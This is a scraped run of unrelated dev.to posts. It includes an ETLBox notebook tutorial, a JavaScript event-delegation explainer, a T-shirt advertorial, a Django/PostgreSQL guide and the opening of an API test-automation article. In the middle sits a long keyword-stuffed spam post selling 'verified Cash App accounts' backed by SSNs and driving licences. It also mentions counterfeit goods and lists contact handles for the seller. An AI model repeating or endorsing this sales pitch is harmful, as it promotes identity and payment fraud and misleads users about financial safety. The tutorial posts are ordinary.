Before creating the table, ensure any existing table with the same name is dropped to start fresh. This step is handled by the `DropTableTask.DropIfExists` method.

```csharp
DropTableTask.DropIfExists(connMan, "Test");
CreateTableTask.CreateIfNotExists(connMan, def);
```

- **Insert Sample Data**

Populate the `Test` table with sample data using SQL INSERT statements.

```csharp
SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-01',100)");
SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-02',350)");
SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-03',470)");
SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-04',134)");
SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-05',42)");
```

- **Execute the code**

After executing the code, check your SQL Server database (`demo` in this example) to verify that the `Test` table has been created and populated with the sample data.

## Loading Data using an ETL Pipeline

Let's see how to load data from a SQL Server database into memory and analyze it using DataFrames in a polyglot notebook environment.

- **Setup Environment**

Ensure you have the necessary libraries installed and configured. We are using ETLBox for ETL operations, including data extraction from SQL Server, and Microsoft's DataFrame for data analysis.

```csharp
#r "nuget:ETLBox, 3.4.0"
#r "nuget:ETLBox.SqlServer, 3.4.0"
#r "nuget:ETLBox.Analysis, 3.4.0"

using ETLBox;
using ETLBox.ControlFlow;
using ETLBox.SqlServer;
using ETLBox.DataFlow;
using ETLBox.Analysis;
```

- **Loading Data from Database**

Initialize the connection manager and define a `DbSource` to extract data from the `Test` table in our SQL Server database.

```csharp
// The connMan was already defined in a previous step!
// IConnectionManager connMan = new SqlConnectionManager("Data Source=localhost;User Id=sa;Password=YourStrong@Passw0rd;Initial Catalog=demo;TrustServerCertificate=true;");
var source = new DbSource(connMan, "Test");
```

- **Transforming Data**

Use a `RowTransformation` to manipulate the data in memory. In this example, we multiply the `YValue` column by 1000.

```csharp
var row = new RowTransformation(rowData => {
    dynamic r = rowData as dynamic;
    r.YValue = r.YValue * 1000;
    return rowData;
});
```

- **Multicasting Data**

Utilize a `Multicast` component to split the data flow into two branches:

- One branch feeds data into a `MemoryDestination`, storing data in a C# List (`memDest.Data`).
- The other branch stores data into a `DataFrameDestination`, creating a DataFrame (`dfDest.DataFrame`) for further analysis.

```csharp
var multicast = new Multicast();
var memDest = new MemoryDestination();
var dfDest = new DataFrameDestination();
multicast.OnProgress = pc => Console.WriteLine($"Records loaded from database: {pc}");
```

- **Running the Pipeline**

Until now, we've defined our pipeline components. Now, let's link them together and trigger the data flow.

```csharp
source.LinkTo(row);
row.LinkTo(multicast);
multicast.LinkTo(memDest);
multicast.LinkTo(dfDest);

Network.Execute(source);
```

- **Accessing Loaded Data**

We stored the data loaded into the `MemoryDestination` (`memDest.Data`) and the DataFrame from `DataFrameDestination` (`dfDest.DataFrame`) in variables in our notebook for further analysis and manipulation.

```csharp
var data = memDest.Data; // This is a List<object[]>
var df = dfDest.DataFrame; // This is a Microsoft.Analysis.DataFrame object
```

## Displaying and Analyzing Data

Let's see how we can display and analyze the data loaded into the polyglot notebook.

### Displaying the DataFrame

To begin with, let's display the contents of the DataFrame (`df`). This DataFrame contains the transformed data from our ETL pipeline.

```csharp
// Displaying the DataFrame
df
```

We will get an output like this:

index|Id|XValue|YValue
-----|--|------|------
0|1|2022-01-01 00:00:00Z|100000
1|2|2022-01-02 00:00:00Z|350000
2|3|2022-01-03 00:00:00Z|470000
3|4|2022-01-04 00:00:00Z|134000
4|5|2022-01-05 00:00:00Z|42000

### Transforming the DataFrame

We can perform additional transformations directly on the DataFrame. In this example, we'll create a new column `x` by doubling the values in the `YValue` column.

```csharp
// Transforming the DataFrame
df["x"] = df["YValue"] * 2;
df
```

Now our output becomes this:

index|Id|XValue|YValue|x
-----|--|------|------|--
0|1|2022-01-01 00:00:00Z|100000|200000
1|2|2022-01-02 00:00:00Z|350000|700000
2|3|2022-01-03 00:00:00Z|470000|940000
3|4|2022-01-04 00:00:00Z|134000|268000
4|5|2022-01-05 00:00:00Z|42000|84000

The `Microsoft.Analysis.DataFrame` is highly effective as an in-memory structure for data analysis and querying. You can learn more about it in the Microsoft documentation: [Getting started with DataFrames](https://learn.microsoft.com/en-us/dotnet/machine-learning/how-to-guides/getting-started-dataframe)

### Visualizing Data with ScottPlot

Next, we'll visualize the loaded data using ScottPlot, [a plotting library for .NET.](https://scottplot.net/quickstart/notebook/)

```csharp
#r "nuget:ScottPlot, 4.1.69"

using Microsoft.DotNet.Interactive.Formatting;

// Setup a custom formatter to display plots as images
Formatter.Register(typeof(ScottPlot.Plot),
    (plot, writer) => writer.Write(((ScottPlot.Plot)plot).GetImageHtml()),
    HtmlFormatter.MimeType);

var plt = new ScottPlot.Plot(600, 400);

// Extract data from memDest.Data for plotting
var dataX = memDest.Data.Select(row => (DateTime)(row as dynamic).XValue)
                        .Select(dt => dt.ToOADate()).ToArray();
var dataY = memDest.Data.Select(row => (double)(row as dynamic).YValue).ToArray();

// Add scatter plot to ScottPlot
plt.XAxis.DateTimeFormat(true); // Enable DateTime formatting on X-axis if applicable
plt.AddScatter(dataX, dataY);
plt
```

This will print out our data as a plot:

![Scottplot Output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xca1idpaybbb4pdkeqi7.jpg)

## Final Thoughts

Using C# in polyglot notebooks allows data professionals to work without needing to learn a new programming language. Polyglot notebooks enable users to apply their existing knowledge of C# and the .NET framework in one environment, enhanced by the power of Jupyter notebooks. By default, existing data frameworks only support loading basic files (like CSV). This makes the inclusion of ETL processes in notebooks essential for managing more complex data tasks. [ETLBox, tailored for C#, stands out as the best framework designed specifically for this purpose.](https://www.etlbox.net/?utm_source=devto&utm_content=polyglot) Together, C#, polyglot notebooks, and ETLBox simplify data processing, supporting data professionals to work more efficiently and make better decisions based on their data.

### Code on Github

The notebook code for this example [is available on GitHub for further exploration and contribution.](https://github.com/etlbox/etlbox.demo/blob/main/Polyglot/ExampleNotebook.ipynb)
andreaslennartz
1,909,083
Event Delegation
Funny Example Alright, let's use a funny example with a classroom and students. Imagine a...
0
2024-07-02T15:37:42
https://dev.to/__khojiakbar__/event-delegation-1f8
event, delegation, javascript
## Funny Example

Alright, let's use a funny example with a classroom and students. Imagine a classroom full of students, and each student is holding a card. When you tap a student's card, they say something funny. Instead of going to each student and asking them to say something funny when tapped, you tell the teacher to watch over all the students and handle it.

Here's how it works with event delegation:

1. The Students and the Teacher:
   - The students are the items you want to interact with.
   - The teacher is the parent element that listens for the tap (click) on any student's card.
2. The Plan:
   - You tell the teacher, "Hey, whenever someone taps a student's card, let's make that student say something funny!"

Now, let's see this in JavaScript:

```
<!DOCTYPE html>
<html>
<head>
  <title>Event Delegation Classroom</title>
</head>
<body>
  <div id="classroom">
    <div class="student" style="background-color: yellow;">🧑‍🎓</div>
    <div class="student" style="background-color: orange;">🧑‍🎓</div>
    <div class="student" style="background-color: pink;">🧑‍🎓</div>
  </div>

  <script>
    // The teacher (parent)
    const classroom = document.getElementById('classroom');

    // Add an event listener to the teacher
    classroom.addEventListener('click', function(event) {
      // Check if the clicked element is a student
      if (event.target.classList.contains('student')) {
        alert('Student says: "Why was the math book sad? It had too many problems!"');
      }
    });
  </script>
</body>
</html>
```

So, event delegation is like having a teacher who handles all the funny jokes for the students, making it easier and more efficient!
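The delegation check itself is plain logic and can be exercised outside the browser. Here is a sketch with hand-rolled mock event objects standing in for real clicks (the `classroomHandler` name and the mock shapes are illustrative, not part of the DOM API):

```javascript
// Same check as the listener above: only react if the click landed on a student
function classroomHandler(event) {
  if (event.target.classList.contains('student')) {
    return 'Student says: "Why was the math book sad? It had too many problems!"';
  }
  return null; // click hit the classroom itself, not a student card
}

// Mock events: one click on a student card, one on the empty container
const studentClick   = { target: { classList: { contains: (c) => c === 'student' } } };
const containerClick = { target: { classList: { contains: () => false } } };

console.log(classroomHandler(studentClick) !== null);   // prints true: the joke fires
console.log(classroomHandler(containerClick) === null); // prints true: the click is ignored
```

Returning the joke instead of calling `alert` keeps the handler testable; in the page, the teacher (parent) would invoke the same check from `addEventListener` exactly as shown in the full example.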
__khojiakbar__
1,909,082
Start of Coding
I made a website with react, I just started today, I need to post this, so I can get better. The...
0
2024-07-02T15:36:19
https://dev.to/ad31aid/start-of-coding-d20
I made a website with react, I just started today, I need to post this, so I can get better. The website is quite shit, but it will get better! https://seven1personalsite.onrender.com
ad31aid
1,909,081
The Tee: A History of Comfort, Rebellion, and Self-Expression
It started life as a practical undergarment in the late 19th century, then evolved into a symbol of...
0
2024-07-02T15:35:06
https://dev.to/pegance_teevibe_7cd8c4acb/the-tee-a-history-of-comfort-rebellion-and-self-expression-4eh
tshirt, mens, womenstshirt, online
It started life as a practical undergarment in the late 19th century, then evolved into a symbol of casualness and self-expression. Early versions were basic tees made from wool or cotton, worn for warmth and sweat absorption. The U.S. Navy adopted a similar design in the 1890s, solidifying its association with practicality. The 20th century saw the [t-shirt's](https://pegance.com/collections/) rise to casual wear. Returning soldiers from World War I preferred the comfort of their undershirts, and cheaper cotton made them more accessible. Hollywood further boosted the t-shirt's coolness factor with actors like Marlon Brando sporting them on screen. Rock and roll cemented this connection, with musicians like Elvis Presley making t-shirts a symbol of rebellion and individuality. The invention of screen printing in the 1930s opened a new era. T-shirts became a canvas for self-expression, adorned with everything from political slogans to band logos. College students were at the forefront, using them to showcase school spirit or social causes. The 70s and 80s saw designer brands enter the game, offering high-quality materials and bold logos. New fabrics like polyester also emerged, making t-shirts more suitable for active lifestyles. Today, the men's t-shirt offers a perfect blend of comfort and style. We have a wide range of fabrics, from classic cotton to performance blends, and various styles to choose from. Graphic tees remain popular, while plain ones are wardrobe essentials. T-shirts transcend mere clothing. They represent casualness, self-expression, and even rebellion. They've been used for social causes, promoting bands and sports teams, and even launching political campaigns. Their presence in iconic photos and films solidifies their place in pop culture history. The future of the t-shirt is likely to involve even more innovation. Sustainable fabrics and advancements in technology could make them even more comfortable and functional. 
One thing's for certain: the t-shirt's ability to adapt ensures its continued relevance in the ever-changing world of fashion.
pegance_teevibe_7cd8c4acb
1,909,080
Buy verified cash app account
https://dmhelpshop.com/product/buy-verified-cash-app-account/ Buy verified cash app account Cash...
0
2024-07-02T15:32:59
https://dev.to/nebise5872/buy-verified-cash-app-account-2410
webdev, javascript, beginners, programming
ERROR: type should be string, got "https://dmhelpshop.com/product/buy-verified-cash-app-account/\n![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/emqtbh4umve9ad9im5ep.png)\n\n\n\nBuy verified cash app account\nCash app has emerged as a dominant force in the realm of mobile banking within the USA, offering unparalleled convenience for digital money transfers, deposits, and trading. As the foremost provider of fully verified cash app accounts, we take pride in our ability to deliver accounts with substantial limits. Bitcoin enablement, and an unmatched level of security.\n\nOur commitment to facilitating seamless transactions and enabling digital currency trades has garnered significant acclaim, as evidenced by the overwhelming response from our satisfied clientele. Those seeking buy verified cash app account with 100% legitimate documentation and unrestricted access need look no further. Get in touch with us promptly to acquire your verified cash app account and take advantage of all the benefits it has to offer.\n\nWhy dmhelpshop is the best place to buy USA cash app accounts?\nIt’s crucial to stay informed about any updates to the platform you’re using. If an update has been released, it’s important to explore alternative options. Contact the platform’s support team to inquire about the status of the cash app service.\n\nClearly communicate your requirements and inquire whether they can meet your needs and provide the buy verified cash app account promptly. 
If they assure you that they can fulfill your requirements within the specified timeframe, proceed with the verification process using the required documents.\n\nOur account verification process includes the submission of the following documents: [List of specific documents required for verification].\n\nGenuine and activated email verified\nRegistered phone number (USA)\nSelfie verified\nSSN (social security number) verified\nDriving license\nBTC enable or not enable (BTC enable best)\n100% replacement guaranteed\n100% customer satisfaction\nWhen it comes to staying on top of the latest platform updates, it’s crucial to act fast and ensure you’re positioned in the best possible place. If you’re considering a switch, reaching out to the right contacts and inquiring about the status of the buy verified cash app account service update is essential.\n\nClearly communicate your requirements and gauge their commitment to fulfilling them promptly. Once you’ve confirmed their capability, proceed with the verification process using genuine and activated email verification, a registered USA phone number, selfie verification, social security number (SSN) verification, and a valid driving license.\n\nAdditionally, assessing whether BTC enablement is available is advisable, buy verified cash app account, with a preference for this feature. It’s important to note that a 100% replacement guarantee and ensuring 100% customer satisfaction are essential benchmarks in this process.\n\nHow to use the Cash Card to make purchases?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card. Alternatively, you can manually enter the CVV and expiration date. 
How To Buy Verified Cash App Accounts.\n\nAfter submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a buy verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account.\n\nWhy we suggest to unchanged the Cash App account username?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card.\n\nAlternatively, you can manually enter the CVV and expiration date. After submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account. Purchase Verified Cash App Accounts.\n\nSelecting a username in an app usually comes with the understanding that it cannot be easily changed within the app’s settings or options. This deliberate control is in place to uphold consistency and minimize potential user confusion, especially for those who have added you as a contact using your username. In addition, purchasing a Cash App account with verified genuine documents already linked to the account ensures a reliable and secure transaction experience.\n\n \n\nBuy verified cash app accounts quickly and easily for all your financial needs.\nAs the user base of our platform continues to grow, the significance of verified accounts cannot be overstated for both businesses and individuals seeking to leverage its full range of features. 
How To Buy Verified Cash App Accounts.\n\nFor entrepreneurs, freelancers, and investors alike, a verified cash app account opens the door to sending, receiving, and withdrawing substantial amounts of money, offering unparalleled convenience and flexibility. Whether you’re conducting business or managing personal finances, the benefits of a verified account are clear, providing a secure and efficient means to transact and manage funds at scale.\n\nWhen it comes to the rising trend of purchasing buy verified cash app account, it’s crucial to tread carefully and opt for reputable providers to steer clear of potential scams and fraudulent activities. How To Buy Verified Cash App Accounts.  With numerous providers offering this service at competitive prices, it is paramount to be diligent in selecting a trusted source.\n\nThis article serves as a comprehensive guide, equipping you with the essential knowledge to navigate the process of procuring buy verified cash app account, ensuring that you are well-informed before making any purchasing decisions. Understanding the fundamentals is key, and by following this guide, you’ll be empowered to make informed choices with confidence.\n\n \n\nIs it safe to buy Cash App Verified Accounts?\nCash App, being a prominent peer-to-peer mobile payment application, is widely utilized by numerous individuals for their transactions. However, concerns regarding its safety have arisen, particularly pertaining to the purchase of “verified” accounts through Cash App. This raises questions about the security of Cash App’s verification process.\n\nUnfortunately, the answer is negative, as buying such verified accounts entails risks and is deemed unsafe. Therefore, it is crucial for everyone to exercise caution and be aware of potential vulnerabilities when using Cash App. 
How To Buy Verified Cash App Accounts.\n\nCash App has emerged as a widely embraced platform for purchasing Instagram Followers using PayPal, catering to a diverse range of users. This convenient application permits individuals possessing a PayPal account to procure authenticated Instagram Followers.\n\nLeveraging the Cash App, users can either opt to procure followers for a predetermined quantity or exercise patience until their account accrues a substantial follower count, subsequently making a bulk purchase. Although the Cash App provides this service, it is crucial to discern between genuine and counterfeit items. If you find yourself in search of counterfeit products such as a Rolex, a Louis Vuitton item, or a Louis Vuitton bag, there are two viable approaches to consider.\n\n \n\nWhy you need to buy verified Cash App accounts personal or business?\nThe Cash App is a versatile digital wallet enabling seamless money transfers among its users. However, it presents a concern as it facilitates transfer to both verified and unverified individuals.\n\nTo address this, the Cash App offers the option to become a verified user, which unlocks a range of advantages. Verified users can enjoy perks such as express payment, immediate issue resolution, and a generous interest-free period of up to two weeks. With its user-friendly interface and enhanced capabilities, the Cash App caters to the needs of a wide audience, ensuring convenient and secure digital transactions for all.\n\nIf you’re a business person seeking additional funds to expand your business, we have a solution for you. Payroll management can often be a challenging task, regardless of whether you’re a small family-run business or a large corporation. How To Buy Verified Cash App Accounts.\n\nImproper payment practices can lead to potential issues with your employees, as they could report you to the government. 
However, worry not, as we offer a reliable and efficient way to ensure proper payroll management, avoiding any potential complications. Our services provide you with the funds you need without compromising your reputation or legal standing. With our assistance, you can focus on growing your business while maintaining a professional and compliant relationship with your employees. Purchase Verified Cash App Accounts.\n\nA Cash App has emerged as a leading peer-to-peer payment method, catering to a wide range of users. With its seamless functionality, individuals can effortlessly send and receive cash in a matter of seconds, bypassing the need for a traditional bank account or social security number. Buy verified cash app account.\n\nThis accessibility makes it particularly appealing to millennials, addressing a common challenge they face in accessing physical currency. As a result, ACash App has established itself as a preferred choice among diverse audiences, enabling swift and hassle-free transactions for everyone. Purchase Verified Cash App Accounts.\n\n \n\nHow to verify Cash App accounts\nTo ensure the verification of your Cash App account, it is essential to securely store all your required documents in your account. This process includes accurately supplying your date of birth and verifying the US or UK phone number linked to your Cash App account.\n\nAs part of the verification process, you will be asked to submit accurate personal details such as your date of birth, the last four digits of your SSN, and your email address. If additional information is requested by the Cash App community to validate your account, be prepared to provide it promptly. Upon successful verification, you will gain full access to managing your account balance, as well as sending and receiving funds seamlessly. 
Buy verified cash app account.\n\n \n\nHow cash used for international transaction?\nExperience the seamless convenience of this innovative platform that simplifies money transfers to the level of sending a text message. It effortlessly connects users within the familiar confines of their respective currency regions, primarily in the United States and the United Kingdom.\n\nNo matter if you’re a freelancer seeking to diversify your clientele or a small business eager to enhance market presence, this solution caters to your financial needs efficiently and securely. Embrace a world of unlimited possibilities while staying connected to your currency domain. Buy verified cash app account.\n\nUnderstanding the currency capabilities of your selected payment application is essential in today’s digital landscape, where versatile financial tools are increasingly sought after. In this era of rapid technological advancements, being well-informed about platforms such as Cash App is crucial.\n\nAs we progress into the digital age, the significance of keeping abreast of such services becomes more pronounced, emphasizing the necessity of staying updated with the evolving financial trends and options available. Buy verified cash app account.\n\nOffers and advantage to buy cash app accounts cheap?\nWith Cash App, the possibilities are endless, offering numerous advantages in online marketing, cryptocurrency trading, and mobile banking while ensuring high security. As a top creator of Cash App accounts, our team possesses unparalleled expertise in navigating the platform.\n\nWe deliver accounts with maximum security and unwavering loyalty at competitive prices unmatched by other agencies. Rest assured, you can trust our services without hesitation, as we prioritize your peace of mind and satisfaction above all else.\n\nEnhance your business operations effortlessly by utilizing the Cash App e-wallet for seamless payment processing, money transfers, and various other essential tasks. 
Amidst a myriad of transaction platforms in existence today, the Cash App e-wallet stands out as a premier choice, offering users a multitude of functions to streamline their financial activities effectively. Buy verified cash app account.\n\nTrustbizs.com stands by the Cash App’s superiority and recommends acquiring your Cash App accounts from this trusted source to optimize your business potential.\n\nHow Customizable are the Payment Options on Cash App for Businesses?\nDiscover the flexible payment options available to businesses on Cash App, enabling a range of customization features to streamline transactions. Business users have the ability to adjust transaction amounts, incorporate tipping options, and leverage robust reporting tools for enhanced financial management.\n\nExplore trustbizs.com to acquire verified Cash App accounts with LD backup at a competitive price, ensuring a secure and efficient payment solution for your business needs. Buy verified cash app account.\n\nDiscover Cash App, an innovative platform ideal for small business owners and entrepreneurs aiming to simplify their financial operations. With its intuitive interface, Cash App empowers businesses to seamlessly receive payments and effectively oversee their finances. Emphasizing customization, this app accommodates a variety of business requirements and preferences, making it a versatile tool for all.\n\nWhere To Buy Verified Cash App Accounts\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. 
It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nThe Importance Of Verified Cash App Accounts\nIn today’s digital age, the significance of verified Cash App accounts cannot be overstated, as they serve as a cornerstone for secure and trustworthy online transactions.\n\nBy acquiring verified Cash App accounts, users not only establish credibility but also instill the confidence required to participate in financial endeavors with peace of mind, thus solidifying its status as an indispensable asset for individuals navigating the digital marketplace.\n\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nConclusion\nEnhance your online financial transactions with verified Cash App accounts, a secure and convenient option for all individuals. By purchasing these accounts, you can access exclusive features, benefit from higher transaction limits, and enjoy enhanced protection against fraudulent activities. Streamline your financial interactions and experience peace of mind knowing your transactions are secure and efficient with verified Cash App accounts.\n\nChoose a trusted provider when acquiring accounts to guarantee legitimacy and reliability. In an era where Cash App is increasingly favored for financial transactions, possessing a verified account offers users peace of mind and ease in managing their finances. 
Make informed decisions to safeguard your financial assets and streamline your personal transactions effectively.\n\nContact Us / 24 Hours Reply\nTelegram:dmhelpshop\nWhatsApp: +1 ‪(980) 277-2786\nSkype:dmhelpshop\nEmail:dmhelpshop@gmail.com\n\n"
nebise5872
1,908,282
Working with Databases in Django Using PostgreSQL
Introduction Django simplifies database interaction with its Object-Relational Mapping...
0
2024-07-02T15:29:07
https://dev.to/kihuni/working-with-databases-in-django-using-postgresql-9co
webdev, beginners, python, devops
# Introduction

Django simplifies database interaction with its Object-Relational Mapping (ORM) system, enabling Python code to be used for working with databases instead of writing SQL. This guide provides essential information on using PostgreSQL in Django, from database setup to performing CRUD operations.

## Setting Up the Database

### Database Configuration

- Installing PostgreSQL: Ensure that PostgreSQL is installed on your system. If you're new to Postgres, here's a guide to help you get started: [Getting Started with PostgreSQL](https://www.postgresqltutorial.com/postgresql-getting-started/).
- Installing psycopg2: Install the PostgreSQL adapter for Python.

```bash
pip install psycopg2-binary
```

- Configure your database settings in the `settings.py` file.

```python
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'mydatabase',
        'USER': 'mydatabaseuser',
        'PASSWORD': 'mypassword',
        'HOST': 'localhost',
        'PORT': '5432',
    }
}
```

## Defining Models

### Creating a Model

A model in Django is a Python class that subclasses `django.db.models.Model` and defines the fields and behaviors of the data you're storing. For example:

```python
from django.db import models

class Author(models.Model):
    name = models.CharField(max_length=100)
    birth_date = models.DateField()
```

### Fields

Field Types: Django provides various field types to map Python types to PostgreSQL columns.

- CharField: Stores text data with a maximum length.
- IntegerField: Stores integer values.
- DateField: Stores dates.
- ForeignKey: Defines a many-to-one relationship.

### Meta Class

The `Meta` class inside a model contains metadata options. Example:

```python
class Author(models.Model):
    name = models.CharField(max_length=100)
    birth_date = models.DateField()

    class Meta:
        ordering = ['name']
```

- ordering: Orders query results by the specified fields.

## Migrating the Database

- Create Migrations: Generate migration files based on your models.
```bash
python manage.py makemigrations
```

- Apply Migrations: Apply the migration files to update your database schema.

```bash
python manage.py migrate
```

## CRUD Operations

### Creating Records

- Using the ORM: Create new records by instantiating a model and calling the `save()` method (for example, inside `python manage.py shell`).

```python
from postgress_database.models import Author

author = Author(name='John Doe', birth_date='1980-01-01')
author.save()
```

### Reading Records

QuerySet API: Retrieve records using methods like `all()`, `filter()`, `get()`, etc. Example:

```python
authors = Author.objects.all()
author = Author.objects.get(id=1)
filtered_authors = Author.objects.filter(name__icontains='john')
```

### Updating Records

- Modifying and Saving: Update records by modifying model instances and calling `save()`.

```python
author = Author.objects.get(id=1)
author.name = 'Jane Doe'
author.save()
```

### Deleting Records

Delete Method: Remove records using the `delete()` method.

```python
author = Author.objects.get(id=1)
author.delete()
```

## QuerySet Methods

### Common Methods

- `all()`: Returns all records.

```python
authors = Author.objects.all()
```

- `filter()`: Returns records matching the given criteria.

```python
filtered_authors = Author.objects.filter(name__icontains='john')
```

- `exclude()`: Excludes records matching the given criteria.

```python
non_john_authors = Author.objects.exclude(name__icontains='john')
```

- `order_by()`: Orders records by the specified field.

```python
ordered_authors = Author.objects.order_by('name')
```

- `values()`: Returns a QuerySet of dictionaries instead of model instances.
```python
author_values = Author.objects.values('name', 'birth_date')
```

## Relationships

### One-to-Many Relationships

- ForeignKey: Define a many-to-one relationship using [ForeignKey](https://docs.djangoproject.com/en/5.0/topics/db/examples/many_to_one/).

```python
class Book(models.Model):
    title = models.CharField(max_length=200)
    author = models.ForeignKey(Author, on_delete=models.CASCADE)
```

### Many-to-Many Relationships

- ManyToManyField: Define a [many-to-many relationship](https://docs.djangoproject.com/en/5.0/topics/db/examples/many_to_many/).

```python
class Publisher(models.Model):
    name = models.CharField(max_length=100)

class Book(models.Model):
    title = models.CharField(max_length=200)
    authors = models.ManyToManyField(Author)
    publisher = models.ForeignKey(Publisher, on_delete=models.CASCADE)
```

### One-to-One Relationships

- OneToOneField: Define a [one-to-one relationship](https://docs.djangoproject.com/en/5.0/topics/db/examples/one_to_one/).

```python
from django.contrib.auth.models import User

class Profile(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    bio = models.TextField()
```

## Conclusion

Working with databases in Django involves understanding how to configure your database, define models, and perform CRUD operations efficiently. Using PostgreSQL with Django's ORM simplifies these tasks, allowing you to write Python code instead of SQL queries. This guide provides a foundational understanding.
kihuni
1,909,067
July 3: Virtual AI, Machine Learning and Computer Vision Meetup
Don’t forget to join us this Wed on July 3 for the monthly AI, Machine Learning and Computer Vision...
0
2024-07-02T15:21:36
https://dev.to/voxel51/july-3-virtual-ai-machine-learning-and-computer-vision-meetup-3i51
computervision, ai, machinelearning, datascience
Don’t forget to join us this Wednesday, July 3, for the monthly AI, Machine Learning and Computer Vision Meetup!

**Register for the Zoom**: [https://voxel51.com/computer-vision-events/ai-machine-learning-computer-vision-meetup-july-3-2024/](https://voxel51.com/computer-vision-events/ai-machine-learning-computer-vision-meetup-july-3-2024/)

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l2e0juoai3dtm9yoc73n.gif)

We have a great lineup of speakers, including:

* **Performance Optimization for Multimodal LLMs** - [Neha Sharma](https://www.linkedin.com/in/hashux/) from Ori Industries
* **Deep Dive: Responsible and Unbiased GenAI for Computer Vision** - [Daniel Gural](https://www.linkedin.com/in/daniel-gural/) at Voxel51
* **5 Handy Ways to Use Embeddings, the Swiss Army Knife of AI** - [Harpreet Sahota](https://www.linkedin.com/in/harpreetsahota204/) at Voxel51
jguerrero-voxel51
1,909,066
API Test Automation: A Comprehensive Guide
Introduction Application Programming Interfaces (APIs) are the backbone of modern software...
0
2024-07-02T15:18:35
https://dev.to/keploy/api-test-automation-a-comprehensive-guide-59c5
api, javascript, ai, productivity
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gnqg2tr1qkzyxup3mnda.png)

## Introduction

Application Programming Interfaces (APIs) are the backbone of modern software architectures. They enable different software systems to communicate with each other, facilitating the seamless integration of services and the exchange of data. As the reliance on APIs increases, ensuring their reliability, performance, and security becomes paramount. This is where API test automation comes into play. This article delves into the importance of [API test automation](https://keploy.io/blog/community/mastering-api-test-automation-best-practices-and-tools), its benefits, best practices, and tools to help you get started.

## What is API Test Automation?

API test automation involves using automated tools to test APIs, ensuring they function as expected, meet performance standards, and are secure. Unlike manual testing, which can be time-consuming and error-prone, automated testing allows for the execution of repetitive tests efficiently and consistently.

## Why is API Test Automation Important?

1. Efficiency and Speed: Automated tests can be executed quickly, allowing for more tests to be run in less time compared to manual testing.
2. Consistency and Accuracy: Automation reduces human error, ensuring consistent and accurate test results.
3. Early Bug Detection: Automated tests can be integrated into the development pipeline, enabling early detection of bugs and issues, which can be fixed before they become critical problems.
4. Regression Testing: Automated tests are ideal for regression testing, ensuring that new changes do not break existing functionality.
5. Scalability: Automated testing can handle complex test scenarios and large datasets, making it scalable as the API grows.

## Key Components of API Test Automation

1. Test Planning: Define the scope, objectives, and criteria for API testing. Identify the APIs to be tested and the types of tests to be performed (e.g., functional, performance, security).
2. Test Design: Design test cases based on the API specifications. This includes defining input parameters, expected outcomes, and handling edge cases.
3. Test Implementation: Develop automated test scripts using appropriate tools and frameworks. Ensure scripts are modular, reusable, and maintainable.
4. Test Execution: Run automated tests regularly, ideally as part of the continuous integration/continuous deployment (CI/CD) pipeline.
5. Test Reporting: Generate detailed test reports to provide insights into test results, coverage, and detected issues.
6. Test Maintenance: Regularly update test scripts to accommodate changes in the API and ensure continued relevance and accuracy.

## Types of API Tests

1. Functional Testing: Validates the functionality of the API endpoints to ensure they return the correct responses for given inputs.
2. Performance Testing: Assesses the API's performance under various conditions, including load testing, stress testing, and scalability testing.
3. Security Testing: Evaluates the API's security mechanisms, including authentication, authorization, encryption, and vulnerability assessments.
4. Integration Testing: Ensures the API integrates seamlessly with other components and systems.
5. Validation Testing: Verifies the API's compliance with specifications and standards.

## Best Practices for API Test Automation

1. Use a Reliable Testing Framework: Choose a robust testing framework that supports your requirements and integrates well with your development environment.
2. Adopt a Test-First Approach: Implement test-driven development (TDD) or behavior-driven development (BDD) practices to write tests before the API implementation.
3. Leverage Mocking and Stubbing: Use mock servers and stubs to simulate API responses for isolated testing.
4. Maintain a Clear Test Strategy: Define clear objectives, scope, and criteria for your API tests. Prioritize critical endpoints and scenarios.
5. Ensure Data-Driven Testing: Utilize data-driven testing techniques to validate API behavior with different data sets and edge cases.
6. Automate Test Execution: Integrate automated tests into your CI/CD pipeline for continuous testing and immediate feedback.
7. Monitor API Changes: Keep track of API changes and update your test scripts accordingly to maintain accuracy.
8. Focus on Reusability and Maintainability: Write modular and reusable test scripts to reduce redundancy and simplify maintenance.
9. Generate Comprehensive Reports: Create detailed test reports to analyze results, track coverage, and identify areas for improvement.
10. Regularly Review and Refactor Tests: Periodically review and refactor your test scripts to enhance performance and address any technical debt.

## Popular Tools for API Test Automation

1. Postman: A versatile tool for API development and testing, Postman offers features like automated testing, mocking, and monitoring. It supports scripting with JavaScript and integrates well with CI/CD pipelines.
